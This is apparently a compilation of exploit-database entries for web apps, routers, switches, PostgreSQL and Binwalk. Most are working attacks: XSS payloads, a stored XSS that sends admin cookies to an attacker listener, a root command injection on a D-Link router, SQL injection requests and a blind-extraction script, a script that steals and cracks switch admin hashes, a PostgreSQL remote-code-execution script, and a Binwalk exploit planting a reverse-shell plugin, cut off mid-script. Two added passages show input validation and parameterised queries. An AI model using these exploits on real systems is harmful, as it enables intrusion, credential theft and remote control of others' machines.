<input type="hidden" name="etpartdatelast" value="10/6/2022" />
<input type="hidden" name="stparttimelast" value="" />
<input type="hidden" name="etparttimelast" value="" />
<input type="hidden" name="IsAllDayEvent" value="1" />
<input type="hidden" name="Location" value="CSRF" />
<input type="hidden" name="Description" value='<p style="text-align: left;">CSRF</p>' />
<input type="hidden" name="timezone" value="4.5" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

The XSS will be triggered when viewing the related event.
-
zstore 6.6.0 - Cross-Site Scripting (XSS)
## Exploit Title: zstore 6.6.0 - Cross-Site Scripting (XSS)
## Development: nu11secur1ty
## Date: 01.29.2023
## Vendor: https://zippy.com.ua/
## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4
## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4

## Description:
The value of manual insertion `point 1` is copied into the HTML document as plain text between tags. The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in the manual insertion point 1. This input was echoed unmodified in the application's response.

## STATUS: HIGH Vulnerability

[+] Exploit:

```
GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a HTTP/2
Host: store.zippy.com.ua
Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```

[+] Response:

```
HTTP/2 200 OK
Server: nginx
Date: Sun, 29 Jan 2023 07:27:55 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546

Class \App\Pages\Chatgiflc<a href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif"> does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>
```

## Proof and Exploit:
[href](https://streamable.com/aadj5c)

## Reference:
[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected)

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
-
Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2021-09-17
# Exploit Author: Matteo Conti - https://deltaspike.io
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Ubuntu 18.04 - LAMP

# Description
The application allows sending a message to the admin from the "contacts" section. By including an XSS payload in the title or message (and possibly also in the email field, by bypassing the client-side controls), the payload is executed when the admin opens the message to read it.

# Vulnerable page:
/admin/view-enquiry.php?viewid=1 (change the "viewid" according to the number of the message)

# Tested Payload:
<img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>

# Proof of concept:
- From /contact.php, send a message containing the following payload in the "title" or "message" fields:
  <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>
  (the first URL has to be an existing image)
- Log in with admin credentials, go to /admin/unreadenq.php and click "view" next to the new message to execute the payload. After the first view, you can execute the payload again from /admin/readenq.php
- Your listener will receive the PHP session id.
-
Liferay Portal 6.2.5 - Insecure Permissions
# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions
# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/
# Date: 2021/05
# Exploit Author: fu2x2000
# Version: Liferay Portal 6.2.5 or later
# CVE : CVE-2021-33990

```python
import sys
import requests

print("Search this on Google #Dork for liferay -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")

if len(sys.argv) != 2:
    print("Usage: python3 exploit.py http://target")
    sys.exit(1)

# Base URL of the Liferay instance, followed by the exposed CKEditor file browser
url = sys.argv[1].rstrip("/") + "/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"
req = requests.get(url)
print(req)
sta = req.status_code
if sta == 200:
    print('Life Vulnerability exists')
    cook = url
    print(cook)
    # File-upload command of the browser connector (not sent by this script)
    inject = "Command=FileUpload&Type=File&CurrentFolder=/"
    #cook_inject = cook+inject
    #print cook_inject
else:
    print('not found try a another method')

print("solution restrict access and user groups")
```
-
D-Link DIR-846 - Remote Command Execution (RCE) vulnerability
# Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability
# Google Dork: NA
# Date: 30/01/2023
# Exploit Author: Françoa Taffarel
# Vendor Homepage: https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suporte
# Software Link: https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
# Version: DIR846enFW100A53DBR-Retail
# Tested on: D-LINK DIR-846
# CVE : CVE-2022-46552

D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request.

### Malicious POST Request
```
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
Content-Length: 171
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7; PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4

{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}
```

### Response
```
HTTP/1.1 200 OK
X-Powered-By: PHP/7.1.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Thu, 01 Dec 2022 11:03:54 GMT
Server: lighttpd/1.4.35
Content-Length: 68

{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}
```

### Data from RCE Request
```
GET /HNAP1/rce_confirmed HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV; PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
Upgrade-Insecure-Requests: 1
```

### Response
```
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Date: Thu, 01 Dec 2022 23:24:28 GMT
Server: lighttpd/1.4.35

uid=0(root)
gid=0(root)
```
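The root cause above is a firmware handler that passes the `lan(0)_dhcps_staticlist` value to a shell, so `$(id>rce_confirmed)` in what should be a hostname field runs as root. The check a practitioner wants on the device (or in a WAF in front of HNAP) is a strict allow-list per field, applied before the value goes anywhere near a command line. The block below is an added example written for this page, not D-Link's code: it assumes the entry layout `<enable>,<hostname>,<mac>,<ipv4>` inferred from the request in the post, and validates each field with its own grammar rather than trying to blacklist shell characters.

```python
import json
import re
from ipaddress import IPv4Address, AddressValueError

# Assumed field layout of one static-lease entry, taken from the request in the post.
_MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")
# RFC 1123 hostname label: letters, digits and hyphens only, no leading/trailing hyphen.
_HOST_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def validate_staticlist_entry(entry):
    """Return (True, "") for a well-formed entry, else (False, reason).

    A hostname such as "$(id>rce_confirmed)" fails the label regex long
    before it could reach a shell; there is no list of "bad characters"
    to keep up to date.
    """
    fields = entry.split(",")
    if len(fields) != 4:
        return False, "expected 4 comma-separated fields, got %d" % len(fields)
    enable, host, mac, ip = fields
    if enable not in ("0", "1"):
        return False, "enable flag must be 0 or 1"
    if not _HOST_RE.match(host):
        return False, "hostname %r is not an RFC 1123 label" % host
    if not _MAC_RE.match(mac):
        return False, "bad MAC address %r" % mac
    try:
        IPv4Address(ip)
    except AddressValueError:
        return False, "bad IPv4 address %r" % ip
    return True, ""


def check_hnap_body(body):
    """Validate every *_dhcps_staticlist parameter in a SetIpMacBindSettings body.

    Returns a list of (parameter, reason) for rejected values; an empty list
    means the request may be passed on to the handler.
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return [("body", "not valid JSON")]
    settings = doc.get("SetIpMacBindSettings", {})
    problems = []
    for key, value in settings.items():
        if key.endswith("_dhcps_staticlist"):
            ok, reason = validate_staticlist_entry(str(value))
            if not ok:
                problems.append((key, reason))
    return problems


# Constructed samples: the body from the post and a benign equivalent.
MALICIOUS_BODY = ('{"SetIpMacBindSettings":{"lan_unit":"0",'
                  '"lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}')
BENIGN_BODY = ('{"SetIpMacBindSettings":{"lan_unit":"0",'
               '"lan(0)_dhcps_staticlist":"1,printer,02:42:d6:f9:dc:4e,192.168.0.15"}}')

if __name__ == "__main__":
    for body in (MALICIOUS_BODY, BENIGN_BODY):
        print(check_hnap_body(body) or "clean")
```

Multi-entry lists are not shown in the post, so the example validates a single entry; if the firmware accepts several entries with some separator, split on that separator first and run every entry through `validate_staticlist_entry`.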
-
Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)
# Exploit Title: Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)
# Date: 2023-01-02
# Exploit Author: Muhammad Navaid Zafar Ansari
# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip
# Version: 1.0
# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)
# CVE: Not Assigned Yet
# References: -

------------------------------------------------------------------------------------
1. Description:
----------------------
Online Eyewear Shop 1.0 allows unauthenticated SQL injection via the 'id' parameter in 'oews/?p=products/view_product&id=?'. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

2. Proof of Concept:
----------------------
Step 1 - Visit the URL http://localhost/oews/?p=products/view_product&id=5 and add a single quote to verify the SQL injection.

Step 2 - Run
sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysql

SQLMap Response:
```
[*] starting @ 04:49:58 /2023-02-01/

[04:49:58] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK
---
[04:50:00] [INFO] testing MySQL
[04:50:00] [INFO] confirming MySQL
[04:50:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.55, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
```

3. Example payload:
----------------------
(boolean-based) ' AND 1=1 AND 'test'='test

4. Burpsuite request:
----------------------
```
GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujip
Connection: close
```
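The sqlmap output above shows the two injection types that matter when the page only reveals whether a product rendered: boolean-based blind and time-based blind. The block below is an added example, not part of the advisory or the shop's code, showing what sqlmap does with that single true/false bit: a constructed stand-in for the vulnerable `view_product` handler (SQLite in memory instead of the real MySQL/MariaDB backend, so it runs offline), a binary-search extractor that recovers an arbitrary SQL expression through the `3' AND <cond> AND 'a'='a` payload shape sqlmap reported, and the parameterised handler that makes the same payload inert. Table and column names are invented for the demonstration; on MySQL the `unicode()` function would be `ORD()`.

```python
import sqlite3

# Constructed stand-in for the shop database (SQLite, so the example is self-contained).
_conn = sqlite3.connect(":memory:", check_same_thread=False)
_conn.executescript("""
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO products VALUES (3, 'Aviator'), (5, 'Wayfarer');
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
""")


def view_product(product_id):
    """Vulnerable handler: the id is concatenated into the query, which is what
    the sqlmap payloads in the post imply.  Returns True when a product row
    would be rendered; that one bit is the whole boolean-blind oracle."""
    sql = "SELECT name FROM products WHERE id = '%s'" % product_id
    try:
        return _conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def view_product_safe(product_id):
    """Hardened handler: bound parameter, so a payload is just an id that matches nothing."""
    row = _conn.execute("SELECT name FROM products WHERE id = ?", (product_id,)).fetchone()
    return row is not None


def extract_string(oracle, expr, max_len=64):
    """Recover the value of SQL expression `expr` through a true/false page oracle.

    Each character is found by binary search over its code point.  The
    condition is wrapped in the `3' AND <cond> AND 'a'='a` shape sqlmap
    reported.  Past the end of the string substr() yields '' and unicode('')
    is NULL, so no comparison is ever true and the search settles on 0,
    which terminates the loop.
    """
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "unicode(substr((%s),%d,1)) > %d" % (expr, pos, mid)
            if oracle("3' AND %s AND 'a'='a" % cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    secret = "SELECT password FROM users WHERE username = 'admin'"
    print("vulnerable handler leaks:", extract_string(view_product, secret))
    print("hardened handler leaks:  ", repr(extract_string(view_product_safe, secret)))
```

Seven oracle requests per character is the cost of the boolean technique; a time-based variant replaces the page check with a measured delay and is slower still, which is why sqlmap prefers the boolean channel when both are available.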
-
bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)
## Title: bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 01.31.2023
## Vendor: https://bgerp.com/Bg/Za-sistemata
## Software: https://github.com/bgerp/bgerp/releases/tag/v22.31
## Reference: https://portswigger.net/kb/issues/00500b01_cookie-manipulation-reflected-dom-based

## Description:
The bgERP system suffers from unsecured login cookies, in which very sensitive login and login-session information is stored! The attacker can trick the already logged-in user, steal the already generated cookie from the system and do VERY DANGEROUS things with the stored sensitive information. This can be very expensive for all companies which are using this system, please be careful! Also, this system has a search parameter vulnerable to reflected XSS attacks!

## STATUS: HIGH Vulnerability

[+] Exploit:
```GET
GET /Portal/Show?recentlySearch_14=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%64%6c%2e%70%68%6e%63%64%6e%2e%63%6f%6d%2f%67%69%66%2f%34%31%31%36%35%37%36%31%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&Cmd%5Bdefault%5D=1 HTTP/1.1
Host: 192.168.100.77:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.100.77:8080/Portal/Show
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SID=rfn0jpm60epeabc1jcrkhgr9c3; brid=MC9tQnJQ_438f57; menuInfo=1254:l :0
Connection: close
Content-Length: 0
```

[+] Response after logout of the system:
```HTTP
HTTP/1.1 302 Found
Date: Tue, 31 Jan 2023 15:13:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: 0
Cache-Control: no-cache, must-revalidate
Location: /core_Users/login/?ret_url=bgerp%2FPortal%2FShow%2FrecentlySearch_14%2F%253Ca%2Bhref%253D%2522https%253A%252F%252Fpornhub.com%252F%2522%2Btarget%253D%2522_blank%2522%2Brel%253D%2522noopener%2Bnofollow%2Bugc%2522%253E%250A%253Cimg%2Bsrc%253D%2522https%253A%252F%252Fdl.phncdn.com%252Fgif%252F41165761.gif%253F%253Ftoken%253DGHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ%2526rs%253D1%2522%2Bstyle%253D%2522border%253A1px%2Bsolid%2Bblack%253Bmax-width%253A100%2525%253B%2522%2Balt%253D%2522Photo%2Bof%2BByron%2BBay%252C%2Bone%2Bof%2BAustralia%2527s%2Bbest%2Bbeaches%2521%2522%253E%250A%253C%252Fa%253E%2FCmd%2Cdefault%2F1%2FCmd%2Crefresh%2F1_48f6f472
Connection: close
Content-Length: 2
Content-Encoding: none
Content-Type: text/html; charset=UTF-8

OK
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bgERP/2023/brERP-v22.31-Cookie-Session-vulnerability%2BXSS-Reflected)

## Proof and Exploit:
[href](https://streamable.com/xhffdu)

## Time spent
`01:30:00`
-
Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure
# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure
# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US: https://www.dell.com/support/kbdoc/en-us/000133476/dsa-2020-042-dell-networking-security-update-for-an-information-disclosure-vulnerability
# Cisco advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos
# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle

```python
import requests
import re
import hashlib
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

if len(sys.argv) < 3:
    print("Usage: python cve-2019-15993.py URL passwordfile")
    sys.exit()

url = sys.argv[1]
file = sys.argv[2]

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def hash_value(value):
    """Calculate the SHA1 hash of a value."""
    sha1 = hashlib.sha1()
    sha1.update(value.encode('utf-8'))
    return sha1.hexdigest()


def userName_parser(text, start_delimiter, end_delimiter):
    """Return every substring enclosed between start_delimiter and end_delimiter."""
    results = []
    start = 0
    while start >= 0:
        start = text.find(start_delimiter, start)
        if start >= 0:
            start += len(start_delimiter)
            end = text.find(end_delimiter, start)
            if end >= 0:
                results.append(text[start:end])
                start = end + len(end_delimiter)
            else:
                # Unterminated element: stop instead of looping forever
                break
    return results


# retrieve the web page
response = requests.get(url, allow_redirects=False, verify=False)

# Read in the values from the file and pre-compute their SHA1 hashes
with open(file, 'r') as f:
    values = f.readlines()
values = [value.strip() for value in values]
hashes = {hash_value(value): value for value in values}

if response.status_code == 302:
    print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n")
    # The redirect target carries the device's API path; the admin user
    # settings endpoint below discloses user names and SHA1 password hashes
    url = response.headers["Location"] + "config/device/adminusersetting"
    response = requests.get(url, verify=False)
    if response.status_code == 200:
        print("[*] Successful request to URL:", url + "\n")
        content = response.text
        users_names = userName_parser(content, "<userName>", "</userName>")
        sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content)
        print("SHA1 Hashes found:\n")
        loops = 0
        while loops < len(sha1_hashes):
            print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n")
            sha1_hash = sha1_hashes[loops]
            if sha1_hash in hashes:
                print("Match:", sha1_hash, hashes[sha1_hash])
                print("\nTesting Credentials via API.\n\n")
                payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash])
                response_login = requests.get(payload, allow_redirects=False, verify=False)
                headers = response_login.headers
                if "sessionID" in headers:
                    print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n")
                    print(headers["sessionID"])
                else:
                    print("Unable to sign in.")
            loops = loops + 1
else:
    print("Host is not vulnerable:", response.status_code)
```

Ken Pyle
M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+
Main: 267-540-3337
Direct: 484-498-8340
Email: kp@cybir.com
Website: www.cybir.com
-
PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 2023-02-01
# Exploit Author: Paulo Trindade (@paulotrindadec), Bruno Stabelini (@Bruno Stabelini), Diego Farias (@fulcrum) and Weslley Shaimon
# Github: https://github.com/paulotrindadec/CVE-2019-9193
# Version: PostgreSQL 9.6.1 on x86_64-pc-linux-gnu
# Tested on: Red Hat Enterprise Linux Server 7.9
# CVE: CVE-2019-9193

```python
#!/usr/bin/python3
import sys
import psycopg2
import argparse


def parseArgs():
    parser = argparse.ArgumentParser(description='PostgreSQL 9.6.1 Authenticated Remote Code Execution')
    parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]')
    parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]')
    parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to connect to the PostgreSQL DB [Default: postgres]')
    parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to connect to the PostgreSQL DB [Default: postgres]')
    parser.add_argument('-c', '--command', nargs='?', help='System command to run')
    args = parser.parse_args()
    return args


def main():
    try:
        # Variables
        RHOST = args.ip
        RPORT = args.port
        USER = args.user
        PASS = args.password
        print(f"\r\n[+] Connect to PostgreSQL - {RHOST}")
        con = psycopg2.connect(host=RHOST, port=RPORT, user=USER, password=PASS)
        if (args.command):
            exploit(con)
        else:
            print("[!] Add argument -c [COMMAND] to execute system commands")
    except psycopg2.OperationalError as e:
        print("Error")
        print("\r\n[-] Failed to connect with PostgreSQL")
        exit()


def exploit(con):
    cur = con.cursor()
    CMD = args.command
    try:
        print('[*] Running\n')
        # Clean up any objects left from a previous run (IF EXISTS so a fresh database does not abort here)
        cur.execute("DROP TABLE IF EXISTS triggeroffsec;")
        cur.execute("DROP FUNCTION IF EXISTS triggeroffsecexeccmd() CASCADE;")
        cur.execute("DROP TABLE IF EXISTS triggeroffsecsource;")
        cur.execute("DROP TRIGGER IF EXISTS shoottriggeroffsecexeccmd ON triggeroffsecsource;")
        # Table that receives the command output
        cur.execute("CREATE TABLE triggeroffsec (id serial PRIMARY KEY, cmdout text);")
        # The command is bound as a string literal into the function body;
        # COPY ... FROM PROGRAM runs it as the OS user of the database server
        cur.execute("""CREATE OR REPLACE FUNCTION triggeroffsecexeccmd() RETURNS TRIGGER LANGUAGE plpgsql AS $BODY$
BEGIN
    COPY triggeroffsec (cmdout) FROM PROGRAM %s;
    RETURN NULL;
END;
$BODY$;
""", [CMD, ])
        # The trigger fires on the first insert and executes the function above
        cur.execute("CREATE TABLE triggeroffsecsource(s_id integer PRIMARY KEY);")
        cur.execute("""CREATE TRIGGER shoottriggeroffsecexeccmd
AFTER INSERT ON triggeroffsecsource
FOR EACH STATEMENT
EXECUTE PROCEDURE triggeroffsecexeccmd();
""")
        cur.execute("INSERT INTO triggeroffsecsource VALUES (2);")
        cur.execute("TABLE triggeroffsec;")
        con.commit()
        returncmd = cur.fetchall()
        for result in returncmd:
            print(result)
    except (Exception, psycopg2.DatabaseError) as error:
        print(error)
    finally:
        if con is not None:
            con.close()
            #print("Closed connection")


if __name__ == "__main__":
    args = parseArgs()
    main()
```
-
Binwalk v2.3.2 - Remote Command Execution (RCE)
# Exploit Title: Binwalk v2.3.2 - Remote Command Execution (RCE)
# Exploit Author: Etienne Lacoche
# CVE-ID: CVE-2022-4510

```python
import os
import argparse

print("")
print("################################################")
print("------------------CVE-2022-4510----------------")
print("################################################")
print("--------Binwalk Remote Command Execution--------")
print("------Binwalk 2.1.2b through 2.3.2 included-----")
print("------------------------------------------------")
print("################################################")
print("----------Exploit by: Etienne Lacoche-----------")
print("---------Contact Twitter: @electr0sm0g----------")
print("------------------Discovered by:----------------")
print("---------Q. Kaiser, ONEKEY Research Lab---------")
print("---------Exploit tested on debian 11------------")
print("################################################")
print("")

parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to input .png file", default=1)
parser.add_argument("ip", help="Ip to nc listener", default=1)
parser.add_argument("port", help="Port to nc listener", default=1)
args = parser.parse_args()

if args.file and args.ip and args.port:
    # PFS/0.9 container header with a single entry named
    # "../../../.config/binwalk/plugins/binwalk.py": binwalk's PFS extractor
    # follows the traversal and writes the entry into the user's plugin directory
    header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e")

    # Plugin source that becomes the PFS entry's content. On its first load it
    # spawns the reverse shell and drops a marker; on the second load it removes
    # the marker, itself and its __pycache__.
    lines = [
        'import binwalk.core.plugin\n',
        'import os\n',
        'import shutil\n',
        'class MaliciousExtractor(binwalk.core.plugin.Plugin):\n',
        '    def init(self):\n',
